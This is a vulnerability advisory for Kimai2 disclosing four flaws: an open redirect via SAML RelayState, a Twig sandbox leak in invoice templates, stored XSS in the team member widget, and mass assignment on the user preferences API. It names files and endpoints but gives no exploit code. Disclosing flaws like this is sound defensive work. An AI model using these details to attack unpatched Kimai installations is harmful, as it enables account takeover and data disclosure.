SB2026041478 - Multiple vulnerabilities in kimai2
Published: April 14, 2026 Updated: April 14, 2026
Breakdown by Severity
- Low
- Medium
- High
- Critical
Description
This security bulletin contains information about 4 secuirty vulnerabilities.
1) Open redirect (CVE-ID: N/A)
The vulnerability allows a remote attacker to redirect users to an attacker-controlled site.
The vulnerability exists due to url redirection to an untrusted site in src/Saml/Security/SamlAuthenticationSuccessHandler.php when processing the RelayState parameter in the SAML ACS handler. A remote attacker can supply a malicious RelayState value to redirect users to an attacker-controlled site.
SAML must be enabled, and exploitation is limited to IdP-initiated SSO flows where a malicious RelayState value is included. User interaction is required to complete SAML authentication.
2) Improper access control (CVE-ID: N/A)
The vulnerability allows a remote user to disclose sensitive information.
The vulnerability exists due to improper access control in the Twig sandbox policy for invoice templates when rendering user-controlled invoice templates. A remote privileged user can embed calls to sensitive User methods in a crafted invoice template to disclose sensitive information.
Only on-premise installations with template upload activated are affected, and user interaction is required because a user must generate an invoice using the malicious template.
3) Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CVE-ID: CVE-2026-40479)
The vulnerability allows a remote user to execute arbitrary script in another user's browser.
The vulnerability exists due to cross-site scripting in the team member widget when rendering user-controlled profile alias data into an HTML attribute via innerHTML. A remote user can inject a specially crafted profile alias to execute arbitrary script in another user's browser.
User interaction is required, and the injected payload is stored in the user alias field and may execute in an administrator's browser session.
4) Improperly Controlled Modification of Dynamically-Determined Object Attributes (CVE-ID: CVE-2026-40486)
The vulnerability allows a remote user to modify restricted financial attributes on their profile.
The vulnerability exists due to improperly controlled modification of dynamically-determined object attributes in src/API/UserController.php::updateUserPreference when handling PATCH requests to /api/users/{id}/preferences. A remote user can send a specially crafted request to modify restricted financial attributes on their profile.
The standard GUI flow marks these preferences as disabled for users without the hourly-rate role, but the API endpoint ignores that flag and persists the changes.
Remediation
Install update from vendor's website.
References
- https://github.com/kimai/kimai/security/advisories/GHSA-3jp4-mhh4-gcgr
- https://github.com/kimai/kimai/security/advisories/GHSA-rh42-6rj2-xwmc
- https://github.com/advisories/GHSA-rh42-6rj2-xwmc
- https://github.com/kimai/kimai/security/advisories/GHSA-g82g-m9vx-vhjg
- https://github.com/advisories/GHSA-g82g-m9vx-vhjg
- https://github.com/kimai/kimai/security/advisories/GHSA-qh43-xrjm-4ggp
- https://github.com/advisories/GHSA-qh43-xrjm-4ggp